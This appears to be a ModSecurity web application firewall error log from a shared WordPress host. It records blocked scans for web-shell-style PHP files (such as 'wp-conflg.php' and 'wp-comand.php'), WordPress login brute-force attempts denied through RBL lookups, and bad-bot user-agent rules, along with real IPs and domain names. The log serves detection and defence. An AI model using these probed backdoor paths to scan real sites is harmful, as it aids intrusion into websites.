[Tue May 26 20:03:36.665283 2026] [security2:error] [pid 113091:tid 113279] [client 103.163.220.30:24671] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/ads-txt/inc/wap1.php"] [unique_id "ahWvQKPxBGSmlFNOy6pK_gAAAk4"]
[Tue May 26 20:03:36.749357 2026] [security2:error] [pid 106517:tid 106681] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvQIZZc2DoU1lPnP2ASwAAAKM"]
[Tue May 26 20:03:37.173389 2026] [security2:error] [pid 106517:tid 106766] [client 103.163.220.15:63505] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/theme-compat/wp-conflg.php"] [unique_id "ahWvQYZZc2DoU1lPnP2AYQAAAPg"]
[Tue May 26 20:03:37.666855 2026] [security2:error] [pid 112029:tid 112202] [client 103.163.220.29:48641] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/images/about.php"] [unique_id "ahWvQaFW0C-ajaCsyFdDRgAAATU"]
[Tue May 26 20:03:38.184438 2026] [security2:error] [pid 106517:tid 106713] [client 103.163.220.31:51037] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/cache/tmp/dofault.php"] [unique_id "ahWvQoZZc2DoU1lPnP2AfwAAAMM"]
[Tue May 26 20:03:38.324065 2026] [security2:error] [pid 112029:tid 112091] [remote 185.227.134.44:41784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.134.227.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvQqFW0C-ajaCsyFdDTgABRj0"]
[Tue May 26 20:03:38.705235 2026] [security2:error] [pid 106517:tid 106723] [client 103.163.220.7:41567] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/twentytwentyfive/parts/"] [unique_id "ahWvQoZZc2DoU1lPnP2AkAAAAM0"]
[Tue May 26 20:03:38.786521 2026] [security2:error] [pid 113091:tid 113267] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvQqPxBGSmlFNOy6pLFwAAAkI"]
[Tue May 26 20:03:39.272752 2026] [security2:error] [pid 113091:tid 113336] [client 103.163.220.39:50585] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/css/colors/sunrise/file.php"] [unique_id "ahWvQ6PxBGSmlFNOy6pLJwAAAoc"]
[Tue May 26 20:03:39.774105 2026] [security2:error] [pid 106517:tid 106658] [client 103.163.220.16:34459] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/abilities-api/chosen.php"] [unique_id "ahWvQ4ZZc2DoU1lPnP2AswAAAI0"]
[Tue May 26 20:03:40.271942 2026] [security2:error] [pid 112029:tid 112160] [client 103.163.220.32:61005] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/database/database.php"] [unique_id "ahWvRKFW0C-ajaCsyFdDYQAAAQs"]
[Tue May 26 20:03:40.768115 2026] [security2:error] [pid 112029:tid 112198] [client 103.163.220.6:56167] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/images/user/"] [unique_id "ahWvRKFW0C-ajaCsyFdDbwAAATE"]
[Tue May 26 20:03:41.293855 2026] [security2:error] [pid 113091:tid 113268] [client 103.163.220.48:27149] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/upgrade-temp-backup/photo-gallery/"] [unique_id "ahWvRaPxBGSmlFNOy6pLOAAAAkM"]
[Tue May 26 20:03:41.400459 2026] [security2:error] [pid 112029:tid 112102] [remote 132.148.78.219:33286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.78.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvRaFW0C-ajaCsyFdDdQABc0g"]
[Tue May 26 20:03:41.644062 2026] [security2:error] [pid 113091:tid 113347] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvRaPxBGSmlFNOy6pLNwAAApI"]
[Tue May 26 20:03:41.786439 2026] [security2:error] [pid 113091:tid 113310] [client 103.163.220.9:49709] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/js/widgets/images/"] [unique_id "ahWvRaPxBGSmlFNOy6pLSQAAAm0"]
[Tue May 26 20:03:41.861462 2026] [security2:error] [pid 112029:tid 112104] [remote 132.148.78.219:33286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.78.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvRaFW0C-ajaCsyFdDfgABVUo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:03:42.288089 2026] [security2:error] [pid 113091:tid 113296] [client 103.163.220.46:42513] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/mu-plugins/block-library/"] [unique_id "ahWvRqPxBGSmlFNOy6pLUAAAAl8"]
[Tue May 26 20:03:42.846713 2026] [security2:error] [pid 112029:tid 112239] [client 51.75.236.151:52968] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "shahvishaal.com"] [uri "/robots.txt"] [unique_id "ahWvRqFW0C-ajaCsyFdDiAAAAVo"]
[Tue May 26 20:03:42.846801 2026] [security2:error] [pid 112029:tid 112239] [client 51.75.236.151:52968] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "shahvishaal.com"] [uri "/robots.txt"] [unique_id "ahWvRqFW0C-ajaCsyFdDiAAAAVo"]
[Tue May 26 20:03:42.867597 2026] [security2:error] [pid 112029:tid 112216] [client 103.163.220.11:54677] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/ai1wm-backups/ID3/"] [unique_id "ahWvRqFW0C-ajaCsyFdDiQAAAUM"]
[Tue May 26 20:03:43.360526 2026] [security2:error] [pid 113091:tid 113159] [remote 50.6.207.27:43784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.207.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWvR6PxBGSmlFNOy6pLWAACPEM"]
[Tue May 26 20:03:43.364724 2026] [security2:error] [pid 113091:tid 113250] [client 103.163.220.10:54831] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/wp-links.php"] [unique_id "ahWvR6PxBGSmlFNOy6pLWwAAAjE"]
[Tue May 26 20:03:43.769565 2026] [security2:error] [pid 112029:tid 112099] [remote 185.227.134.44:41784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.134.227.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvR6FW0C-ajaCsyFdDjQABfUU"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:03:43.800157 2026] [security2:error] [pid 112029:tid 112098] [remote 103.117.180.182:33684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.180.117.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWvR6FW0C-ajaCsyFdDjAABKEQ"]
[Tue May 26 20:03:43.883707 2026] [security2:error] [pid 106517:tid 106712] [client 103.163.220.35:35539] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/css/dist/admin-ui/"] [unique_id "ahWvR4ZZc2DoU1lPnP2BHwAAAMI"]
[Tue May 26 20:03:44.169367 2026] [security2:error] [pid 113091:tid 113289] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvR6PxBGSmlFNOy6pLYwAAAlg"]
[Tue May 26 20:03:44.295668 2026] [security2:error] [pid 106517:tid 106656] [client 148.113.130.202:56168] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "shahvishaal.com"] [uri "/"] [unique_id "ahWvSIZZc2DoU1lPnP2BLQAAAIs"]
[Tue May 26 20:03:44.295786 2026] [security2:error] [pid 106517:tid 106656] [client 148.113.130.202:56168] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "shahvishaal.com"] [uri "/"] [unique_id "ahWvSIZZc2DoU1lPnP2BLQAAAIs"]
[Tue May 26 20:03:44.385988 2026] [security2:error] [pid 106517:tid 106695] [client 103.163.220.25:37519] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/user_data/SafetyTips/"] [unique_id "ahWvSIZZc2DoU1lPnP2BNgAAALE"]
[Tue May 26 20:03:44.891478 2026] [security2:error] [pid 106517:tid 106698] [client 103.163.220.36:40125] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/js/widgets/ws88.php"] [unique_id "ahWvSIZZc2DoU1lPnP2BRwAAALQ"]
[Tue May 26 20:03:45.378478 2026] [security2:error] [pid 113091:tid 113347] [client 103.163.220.20:27039] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/images/media/zo.php"] [unique_id "ahWvSaPxBGSmlFNOy6pLcwAAApI"]
[Tue May 26 20:03:45.840859 2026] [security2:error] [pid 106517:tid 106759] [client 192.42.116.112:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvSYZZc2DoU1lPnP2BZgAA8VA"], referer: https://kingsclub.in/kings-club-restrobar
[Tue May 26 20:03:45.870272 2026] [security2:error] [pid 113091:tid 113348] [client 103.163.220.55:38519] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/xltt.php"] [unique_id "ahWvSaPxBGSmlFNOy6pLegAAApM"]
[Tue May 26 20:03:46.198858 2026] [security2:error] [pid 106517:tid 106766] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvSYZZc2DoU1lPnP2BcAAAAPg"]
[Tue May 26 20:03:46.368641 2026] [security2:error] [pid 106517:tid 106729] [client 103.163.220.51:65171] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/sitemaps/providers/"] [unique_id "ahWvSoZZc2DoU1lPnP2BigAAANM"]
[Tue May 26 20:03:46.408373 2026] [security2:error] [pid 113091:tid 113167] [remote 50.6.207.27:43784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.207.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWvSqPxBGSmlFNOy6pLfQACVEs"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 20:03:46.826804 2026] [security2:error] [pid 113091:tid 113323] [client 31.57.184.107:56540] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.acacia.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahWvSqPxBGSmlFNOy6pLgQAAAno"], referer: https://www.google.com/
[Tue May 26 20:03:46.882669 2026] [security2:error] [pid 106517:tid 106776] [client 103.163.220.29:37171] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/users.php"] [unique_id "ahWvSoZZc2DoU1lPnP2BnAAAAQI"]
[Tue May 26 20:03:47.037497 2026] [security2:error] [pid 113091:tid 113291] [client 14.191.94.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvSqPxBGSmlFNOy6pLfgAAAlo"]
[Tue May 26 20:03:47.167907 2026] [security2:error] [pid 112029:tid 112094] [remote 103.117.180.182:33684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.180.117.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWvS6FW0C-ajaCsyFdDoAABP0A"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 20:03:47.375113 2026] [security2:error] [pid 106517:tid 106679] [client 103.163.220.24:25071] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/network/100.php"] [unique_id "ahWvS4ZZc2DoU1lPnP2BqgAAAKE"]
[Tue May 26 20:03:47.650181 2026] [security2:error] [pid 106517:tid 106536] [remote 222.165.190.235:56030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvS4ZZc2DoU1lPnP2BsQAA6xA"]
[Tue May 26 20:03:47.876122 2026] [security2:error] [pid 106517:tid 106736] [client 103.163.220.44:65177] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/includes/zo.php"] [unique_id "ahWvS4ZZc2DoU1lPnP2BwgAAANo"]
[Tue May 26 20:03:48.127785 2026] [security2:error] [pid 106517:tid 106595] [remote 222.165.190.235:56030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvTIZZc2DoU1lPnP2BywAAwEs"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:03:49.276697 2026] [security2:error] [pid 106517:tid 106760] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvTIZZc2DoU1lPnP2B5AAAAPI"]
[Tue May 26 20:03:49.465575 2026] [security2:error] [pid 106517:tid 106666] [client 103.163.220.8:24377] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wpxml.php"] [unique_id "ahWvTYZZc2DoU1lPnP2B9wAAAJU"]
[Tue May 26 20:03:49.696294 2026] [security2:error] [pid 113091:tid 113260] [client 209.251.16.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWvTaPxBGSmlFNOy6pLpAAAAjs"], referer: https://www.anujtradingco.com/
[Tue May 26 20:03:49.963334 2026] [security2:error] [pid 113091:tid 113293] [client 103.163.220.19:30463] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/cgi-bin/cgi-bin/upload.php"] [unique_id "ahWvTaPxBGSmlFNOy6pLrAAAAlw"]
[Tue May 26 20:03:50.470320 2026] [security2:error] [pid 106517:tid 106766] [client 103.163.220.11:53789] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/cgi-bin/cgi-bin/cgi-bin/cgi-bin/users.php"] [unique_id "ahWvToZZc2DoU1lPnP2CHAAAAPg"]
[Tue May 26 20:03:50.965492 2026] [security2:error] [pid 106517:tid 106697] [client 103.163.220.18:29799] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/fonts/lato/wp-content/plugins/photo-gallery/admin/controllers/images/"] [unique_id "ahWvToZZc2DoU1lPnP2CJgAAALM"]
[Tue May 26 20:03:51.214616 2026] [security2:error] [pid 113091:tid 113269] [client 209.251.16.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWvT6PxBGSmlFNOy6pLtAAAAkQ"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1238221&moderation-hash=7ea5cf9fc7ed18cce4aa8ea53ab838d3
[Tue May 26 20:03:51.793827 2026] [security2:error] [pid 113091:tid 113280] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvT6PxBGSmlFNOy6pLuQAAAk8"]
[Tue May 26 20:03:51.883645 2026] [security2:error] [pid 113091:tid 113224] [client 103.163.220.28:54601] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/sitemaps/providers/fonts/"] [unique_id "ahWvT6PxBGSmlFNOy6pLwQAAAhc"]
[Tue May 26 20:03:52.476896 2026] [security2:error] [pid 106517:tid 106747] [client 103.163.220.35:59737] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/theme-compat/patterns/"] [unique_id "ahWvUIZZc2DoU1lPnP2CUwAAAOU"]
[Tue May 26 20:03:52.988906 2026] [security2:error] [pid 106517:tid 106729] [client 103.163.220.22:34929] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/rithin.php"] [unique_id "ahWvUIZZc2DoU1lPnP2CawAAANM"]
[Tue May 26 20:03:53.485011 2026] [security2:error] [pid 106517:tid 106674] [client 103.163.220.16:29475] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/news-portal/zdata.php"] [unique_id "ahWvUYZZc2DoU1lPnP2CfwAAAJ0"]
[Tue May 26 20:03:53.980185 2026] [security2:error] [pid 113091:tid 113273] [client 103.163.220.15:21427] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/upgrade/chosen.php"] [unique_id "ahWvUaPxBGSmlFNOy6pL0AAAAkg"]
[Tue May 26 20:03:54.417303 2026] [security2:error] [pid 106517:tid 106733] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvUYZZc2DoU1lPnP2ClQAAANc"]
[Tue May 26 20:03:54.477501 2026] [security2:error] [pid 106517:tid 106665] [client 103.163.220.54:61807] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/news-portal/wp-comand.php"] [unique_id "ahWvUoZZc2DoU1lPnP2CpQAAAJQ"]
[Tue May 26 20:03:54.979349 2026] [security2:error] [pid 106517:tid 106651] [client 103.163.220.44:37267] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/wp-pages.php"] [unique_id "ahWvUoZZc2DoU1lPnP2CugAAAIY"]
[Tue May 26 20:03:55.472765 2026] [security2:error] [pid 106517:tid 106758] [client 103.163.220.11:22875] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/block-supports/wp-conflg.php"] [unique_id "ahWvU4ZZc2DoU1lPnP2CzAAAAPA"]
[Tue May 26 20:03:55.860983 2026] [security2:error] [pid 113091:tid 113246] [client 66.249.64.45:39837] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvUqPxBGSmlFNOy6pL3QAAAi0"], referer: https://mosykay.com/prizes/242392127
